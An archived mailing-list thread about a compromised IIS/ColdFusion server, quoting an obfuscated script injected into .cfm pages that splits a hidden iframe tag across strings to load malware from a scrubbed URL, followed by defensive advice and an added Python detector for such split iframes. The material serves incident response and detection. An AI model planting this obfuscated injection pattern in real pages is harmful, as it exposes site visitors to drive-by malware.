> Hi there.  We've just seen a hack attempt that we
> haven't seen before and I wanted to get feedback.
>
> The symptom is that some script code is inserted at
> the bottom of certain pages (e.g. index.cfm).  The
> script (which has been scrubbed) looks like this:
> <script><!--
>       var applstrna0 = "<if";
>       var applstrna1 = "rame src=http://said7";;
>       var applstrna2 = ".[BAD URL HERE]";
>       var applstrna3 = " width=100 height=0></i";
>       var applstrna4 = "frame>";
>       document.write(applstrna0+applstrna1+
>       applstrna2+applstrna3+applstrna4);
> //--></script>
>
> The script downloads malware, which we obviously
> want to prevent. We're trying to determine how it's
> getting in there, whether through an old site with
> inadequate code or the OS or something else. Any
> thoughts?
>
> This is on a server running IIS 6 / CF7.

My first thought is, if this script has actually been written to your
.cfm files, this is a successful hack, not a hack attempt.

My second thought is, why are these files writeable in the first
place? In the vast majority of CF apps, neither the CF user account
nor the IIS user account needs write permission to your CF files.

Finally, I'm not aware of any specific worm that does this exact
thing. Nor am I aware of any IIS issue that would allow this. My guess
is that you have some CF application that allows writes to the
filesystem; perhaps one of the CF sample apps?

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321377
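
The injected script in the quoted message splits the iframe tag across several string variables, so a plain search of the .cfm files for "<iframe" misses it. As an added example (not part of the original thread), this detector joins the string literals in each script block and flags an iframe that only exists after concatenation; the function name, the sample page and the placeholder.invalid host are constructed for illustration.

```python
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
# Single- or double-quoted JavaScript string literal, backslash escapes allowed.
STRING_RE = re.compile(r'"((?:[^"\\\n]|\\.)*)"|\'((?:[^\'\\\n]|\\.)*)\'')
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# A zero width or height is how the injected frame is kept invisible.
HIDDEN_RE = re.compile(r"\b(?:width|height)\s*=\s*[\"']?0\b", re.I)

def find_split_iframes(source):
    """Flag script blocks whose string literals, once joined, form an
    <iframe> tag that never appears verbatim in the block itself."""
    findings = []
    for m in SCRIPT_RE.finditer(source):
        body = m.group(1)
        if "document.write" not in body:
            continue
        joined = "".join(a or b for a, b in STRING_RE.findall(body))
        tag = IFRAME_RE.search(joined)
        if tag and not IFRAME_RE.search(body):
            findings.append({
                "offset": m.start(),
                "tag": tag.group(0),
                "hidden": bool(HIDDEN_RE.search(tag.group(0))),
                # The thread reports the script at the bottom of the page.
                "at_end_of_file": not source[m.end():].strip(),
            })
    return findings

# Constructed sample: a page with the reported pattern appended to it.
SAMPLE = '''<html><body><p>Welcome</p></body></html>
<script><!--
var applstrna0 = "<if";
var applstrna1 = "rame src=http://placeholder";
var applstrna2 = ".invalid";
var applstrna3 = " width=100 height=0></i";
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//--></script>
'''
# Constructed benign page: document.write without a reassembled iframe.
CLEAN = '<script>document.write("<p>" + "hello" + "</p>");</script>'

if __name__ == "__main__":
    for finding in find_split_iframes(SAMPLE):
        print(finding)
```

Run it over a copy of the web root and compare the hits with file modification times to see which pages were written to and when.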